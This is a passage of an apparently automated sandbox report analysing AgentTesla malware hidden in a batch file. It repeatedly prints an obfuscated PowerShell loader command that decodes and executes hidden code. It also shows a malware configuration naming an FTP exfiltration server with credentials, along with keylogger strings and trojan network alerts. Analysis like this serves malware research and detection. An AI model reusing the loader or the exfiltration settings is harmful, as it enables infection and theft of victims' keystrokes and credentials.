iBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr
                            Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vyc2lla2xOYW1lIHNpZWtsPSAkZW5zaWVrbHY6VVNFc2lla2xSTkFNRXNpZWtsOyRxY2dzaWVrbGttID0gc2lla2wiQzpcVXNpZWtsc2Vyc1xzaWVrbCR1c2Vyc2lla2xOYW1lXHNpZWtsZHdtLmJzaWVrbGF0Ijtpc2lla2xmIChUZXNpZWtsc3QtUGFzaWVrbHRoICRxc2lla2xjZ2ttKXNpZWtsIHsgICBzaWVrbCBXcml0c2lla2xlLUhvc3NpZWtsdCAiQmFzaWVrbHRjaCBmc2lla2xpbGUgZnNpZWtsb3VuZDpzaWVrbCAkcWNnc2lla2xrbSIgLXNpZWtsRm9yZWdzaWVrbHJvdW5kc2lla2xDb2xvcnNpZWtsIEN5YW5zaWVrbDsgICAgc2lla2wkZmlsZXNpZWtsTGluZXNzaWVrbCA9IFtTc2lla2x5c3RlbXNpZWtsLklPLkZzaWVrbGlsZV06c2lla2w6UmVhZHNpZWtsQWxsTGlzaWVrbG5lcygkc2lla2xxY2drbXNpZWtsLCBbU3lzaWVrbHN0ZW0uc2lla2xUZXh0LnNpZWtsRW5jb2RzaWVrbGluZ106c2lla2w6VVRGOHNpZWtsKTsgICBzaWVrbCBmb3Jlc2lla2xhY2ggKHNpZWtsJGxpbmVzaWVrbCBpbiAkc2lla2xmaWxlTHNpZWtsaW5lcylzaWVrbCB7ICAgc2lla2wgICAgIHNpZWtsaWYgKCRzaWVrbGxpbmUgc2lla2wtbWF0Y3NpZWtsaCAnXjpzaWVrbDo6ID8oc2lla2wuKykkJ3NpZWtsKSB7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsV3JpdGVzaWVrbC1Ib3N0c2lla2wgIkluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlIGRldHNpZWtsZWN0ZWRzaWVrbCBpbiB0c2lla2xoZSBiYXNpZWtsdGNoIGZzaWVrbGlsZS4ic2lla2wgLUZvcnNpZWtsZWdyb3VzaWVrbG5kQ29sc2lla2xvciBDeXNpZWtsYW47ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsdHJ5IHtzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAkZGVjc2lla2xvZGVkQnNpZWtseXRlcyBzaWVrbD0gW1N5c2lla2xzdGVtLnNpZWtsQ29udmVzaWVrbHJ0XTo6c2lla2xGcm9tQnNpZWtsYXNlNjRzaWVrbFN0cmluc2lla2xnKCRtYXNpZWtsdGNoZXNzaWVrbFsxXS5Uc2lla2xyaW0oKXNpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgJGlzaWVrbG5qZWN0c2lla2xpb25Db3NpZWtsZGUgPSBzaWVrbFtTeXN0c2lla2xlbS5UZXNpZWtseHQuRW5zaWVrbGNvZGluc2lla2xnXTo6VXNpZWtsbmljb2RzaWVrbGUuR2V0c2lla2xTdHJpbnNpZWtsZygkZGVzaWVrbGNvZGVkc2lla2xCeXRlc3NpZWtsKTsgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICAgV3JzaWVrbGl0ZS1Ic2lla2xvc3QgInNpZWtsSW5qZWNzaWVrbHRpb24gc2lla2xjb2RlIHNpZWtsZGVjb2RzaWVrbGVkIHN1c2lla2xjY2Vzc3NpZWtsZnVsbHlzaWVrbC4iIC1Gc2lla2xvcmVncnNpZWtsb3VuZENzaWVrbG9sb3Igc2lla2xHcmVlbnNpZWtsOyAgICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsICBXcmlzaWVrbHRlLUhvc2lla2xzdCAiRXNpZWtseGVjdXRzaWVrbGluZyBpc2lla2xuamVjdHNpZWtsaW9uIGNzaWVrbG9kZS4uc2lla2wuIiAtRnNpZWtsb3JlZ3JzaWVrbG91bmRDc2lla2xvbG9yIHNpZWtsWWVsbG9zaWVrbHc7ICAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgIEluc2lla2x2b2tlLXNpZWtsRXhwcmVzaWVrbHNzaW9uc2lla2wgJGluanNpZWtsZWN0aW9zaWVrbG5Db2Rlc2lla2w7ICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2wgIGJyZXNpZWtsYWs7ICBzaWVrbCAgICAgc2lla2wgICAgIHNpZWtsfSBjYXRzaWVrbGNoIHsgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbCAgICAgc2lla2xXcml0ZXNpZWtsLUhvc3RzaWVrbCAiRXJyc2lla2xvciBkdXNpZWtscmluZyBzaWVrbGRlY29kc2lla2xpbmcgb3NpZWtsciBleGVzaWVrbGN1dGluc2lla2xnIGluanNpZWtsZWN0aW9zaWVrbG4gY29kc2lla2xlOiAkX3NpZWtsIiAtRm9zaWVrbHJlZ3Jvc2lla2x1bmRDb3NpZWtsbG9yIFJzaWVrbGVkOyAgc2lla2wgICAgIHNpZWtsICAgICBzaWVrbH07ICAgc2lla2wgICAgIHNpZWtsfTsgICBzaWVrbCB9O30gc2lla2xlbHNlIHNpZWtseyAgICBzaWVrbCAgV3Jpc2lla2x0ZS1Ib3NpZWtsc3QgIlNzaWVrbHlzdGVtc2lla2wgRXJyb3NpZWtscjogQmFzaWVrbHRjaCBmc2lla2xpbGUgbnNpZWtsb3QgZm9zaWVr
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-17T23:29:15.315170+010020299271A Network Trojan was detected192.168.2.549721136.243.131.4721TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-03-17T23:29:15.865363+010028555421A Network Trojan was detected192.168.2.549722136.243.131.4760398TCP
                            2025-03-17T23:29:15.870448+010028555421A Network Trojan was detected192.168.2.549722136.243.131.4760398TCP

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.hitplas.ro", "Username": "hit@hitplas.ro", "Password": "@hitplas.ro"}
                            Source: order no_3_17_2025 ref_HR 6473876476374647464657464564764746.batVirustotal: Detection: 8%Perma Link
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: /log.tmp
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: .html
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <html>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </html>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: .html
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <html>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: </html>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>[
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ]<br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: .html
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: .zip
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Time:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>User Name:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>Computer Name:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>OSFullName:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>CPU:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>RAM:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IP Address:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <hr>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: New
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: IP Address:
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: true
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: https://api.ipify.org
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: true
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ftp://ftp.hitplas.ro
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: hit@hitplas.ro
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: @hitplas.ro
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: false
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: appdata
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: dtjsA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: dtjsA.exe
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: dtjsA
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: Type
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <hr>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: <b>[
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: ]</b> (
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: )<br>
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {BACK}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {ALT+TAB}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {ALT+F4}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {TAB}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {ESC}
                            Source: 4.2.powershell.exe.5eb2e30.5.raw.unpackString decryptor: {Win}
